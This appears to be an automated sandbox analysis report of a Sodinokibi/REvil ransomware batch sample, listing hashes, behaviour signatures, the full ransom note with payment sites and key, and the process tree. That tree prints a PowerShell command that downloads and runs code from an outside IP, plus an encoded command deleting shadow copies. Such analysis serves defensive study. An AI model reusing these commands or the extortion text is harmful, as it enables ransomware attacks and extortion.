Analysis
-
max time kernel
134s -
max time network
146s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
19-05-2020 14:10
General
-
Target
16c5855700e70589f21792245af61fb6.bat
-
Size
221B
-
MD5
bf1ad4f345b9b33c5574e4e4458d008a
-
SHA1
b9bca5ce8683a86288b5431fde6d057f34cfe281
-
SHA256
ca5e262f907de83f54f02c1a29643f7584d7934d6aeaf1244dd919d43aac6d05
-
SHA512
4cfd0d06e0a11ff538e91457726895667ed88c73c9b533717bffc82d00e839d690c01917180b01f1c7d6c9640c938ba4991d9c06a7184d0d737f0506d57b3585
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/16c5855700e70589f21792245af61fb6
Extracted
Path
C:\39scc5c-readme.txt
Family
sodinokibi
Ransom Note
---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 39scc5c.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/578F0CBD51C9BC23
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/578F0CBD51C9BC23
3) If you still have problems accessing the site, you can write to us at: [email protected], indicating the external IP address, country, key xG/BQaXnlcbHqng4833dpCfYG5weDyyN4gDTKZYhE51CqdVwIpu0RyEf/dMcj1nh
eI+fhp+LrZpLf1IrztVNBF0gylfe+gsVROjRT0+5zFFvy1fyr1OEas+LTmXZzoE0
tc4RFVf3XA+hAu0Z48bshrho3jR3dthoADkAuI4WibE2jt7XZ9EIW8n5tZIZ7PTj
bFoSIYYj4737cjjFd1Db7dvspj78hqsTIBybmKNNlCKYLU6xk+CYQqO+rwCEQf7X
FOYv9WZ8Q65vJFz17jwffnsteydMRAhezpH3qp64QF0DCoAvDOaya9XUQmIfucQK
6Cb/CueZ+NbbBFU6CR+WbeA6bMM6h7ZNmm6CFxBT5He+kDRLhsu5Prnkgt7l0yIj
a6DYqrV2zkM59sXKqspL5dUG3Br2r9EIfpLrnYP/excX4pdychWB1GdNmGeK88v7
ONc+J5gZYVIB/frUKwFoskwCjyzMNxadTmTYJp565a2tmjGFDnr/0y9rcMLy+uYf
1AjLmx36GGmv1unNL7DZ9eKjVLQk3jU3SAlqvOz5QSS2SpfdTvidgMN/+S0p03BK
Tgu7f04z+2qG7/l7xDBrwTCdvqEjqJapLzU6RaEKq3FCGoiKLhgWzVk74av6uQp8
hpUnOfp8mjpOcM72Koyx03ePfXQA+6B99JFA6yqUKXu63aaqveDhkEJIpwSmeXqg
4q+q9wRk7LzRjzZDoBbR6Igdcr6FgVNSVg1W6NnV7cL299NCWahK0BgBEXhq6+BV
8ezB8C1qUdRp0JMOy9oEBx4e9itv0NZrENZJZWDQzLHR+r4MZL4/ZdWC9bOHzj6d
uiR/UK61gsA2D2pgeKE6ak3NSZJucnbHvqP81EiILrB58dtio+2wJcjD6101l3p2
gFXStuQsBtRjrJp/Xq1gEIlzc0jjOagddRi3eaTgYPyThIdegGjAO3+8U2xckRQU
7WJUpHpBWiiWwATMxQKsPYUoT9QYifVs/1YkgpZ409N30PtGTZUPnE8hM00UEyF7
mwuDY99aYNs+cTmRQbCA2fm1Q/4tKVhj7Xn8f61H4In1UCUbJ/6fPlm83TtmOB1v
zBGORBwxr56S+WZfBexWBTy/mQGy9QzFiX5KMlCqOA+MxxqQIMkN9pw3toEfbOu0
FrfTazYBA3tqfhXJ6nzx91pUZfD+kh1E+OaEDMYCGMHjg1IqpIv/EEGlXuHfGxxP
XCX7DSoLHrWcpXcAbAnBNVIyX6aw4uKai8lX0I3f0HgjYHjTTBbTh75tsgqWKAGA
cSRGM+yXjz39HNQGxS7V5r+3znPKmy4lwN/fEm0L01ABKA==
and extension 39scc5c
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key:
xG/BQaXnlcbHqng4833dpCfYG5weDyyN4gDTKZYhE51CqdVwIpu0RyEf/dMcj1nh
eI+fhp+LrZpLf1IrztVNBF0gylfe+gsVROjRT0+5zFFvy1fyr1OEas+LTmXZzoE0
tc4RFVf3XA+hAu0Z48bshrho3jR3dthoADkAuI4WibE2jt7XZ9EIW8n5tZIZ7PTj
bFoSIYYj4737cjjFd1Db7dvspj78hqsTIBybmKNNlCKYLU6xk+CYQqO+rwCEQf7X
FOYv9WZ8Q65vJFz17jwffnsteydMRAhezpH3qp64QF0DCoAvDOaya9XUQmIfucQK
6Cb/CueZ+NbbBFU6CR+WbeA6bMM6h7ZNmm6CFxBT5He+kDRLhsu5Prnkgt7l0yIj
a6DYqrV2zkM59sXKqspL5dUG3Br2r9EIfpLrnYP/excX4pdychWB1GdNmGeK88v7
ONc+J5gZYVIB/frUKwFoskwCjyzMNxadTmTYJp565a2tmjGFDnr/0y9rcMLy+uYf
1AjLmx36GGmv1unNL7DZ9eKjVLQk3jU3SAlqvOz5QSS2SpfdTvidgMN/+S0p03BK
Tgu7f04z+2qG7/l7xDBrwTCdvqEjqJapLzU6RaEKq3FCGoiKLhgWzVk74av6uQp8
hpUnOfp8mjpOcM72Koyx03ePfXQA+6B99JFA6yqUKXu63aaqveDhkEJIpwSmeXqg
4q+q9wRk7LzRjzZDoBbR6Igdcr6FgVNSVg1W6NnV7cL299NCWahK0BgBEXhq6+BV
8ezB8C1qUdRp0JMOy9oEBx4e9itv0NZrENZJZWDQzLHR+r4MZL4/ZdWC9bOHzj6d
uiR/UK61gsA2D2pgeKE6ak3NSZJucnbHvqP81EiILrB58dtio+2wJcjD6101l3p2
gFXStuQsBtRjrJp/Xq1gEIlzc0jjOagddRi3eaTgYPyThIdegGjAO3+8U2xckRQU
7WJUpHpBWiiWwATMxQKsPYUoT9QYifVs/1YkgpZ409N30PtGTZUPnE8hM00UEyF7
mwuDY99aYNs+cTmRQbCA2fm1Q/4tKVhj7Xn8f61H4In1UCUbJ/6fPlm83TtmOB1v
zBGORBwxr56S+WZfBexWBTy/mQGy9QzFiX5KMlCqOA+MxxqQIMkN9pw3toEfbOu0
FrfTazYBA3tqfhXJ6nzx91pUZfD+kh1E+OaEDMYCGMHjg1IqpIv/EEGlXuHfGxxP
XCX7DSoLHrWcpXcAbAnBNVIyX6aw4uKai8lX0I3f0HgjYHjTTBbTh75tsgqWKAGA
cSRGM+yXjz39HNQGxS7V5r+3znPKmy4lwN/fEm0L01ABKA==
-----------------------------------------------------------------------------------------
!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
!!! !!! ATTENTION !!! !!!
We want to warn you that in case of refusal to pay, we will post your confidential files that we have downloaded for general access or will sell part of them in the shadow market.
URLs
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/578F0CBD51C9BC23
http://decryptor.cc/578F0CBD51C9BC23
Signatures
-
Drops file in System32 directory 1 IoCs
-
Modifies system certificate store 2 TTPs 10 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 23 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of WriteProcessMemory 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 77 IoCs
-
Blacklisted process makes network request 86 IoCs
-
Modifies service 2 TTPs 4 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\16c5855700e70589f21792245af61fb6.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/16c5855700e70589f21792245af61fb6');Invoke-IGISEXRYSOUZFK;Start-Sleep -s 10000"2⤵
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service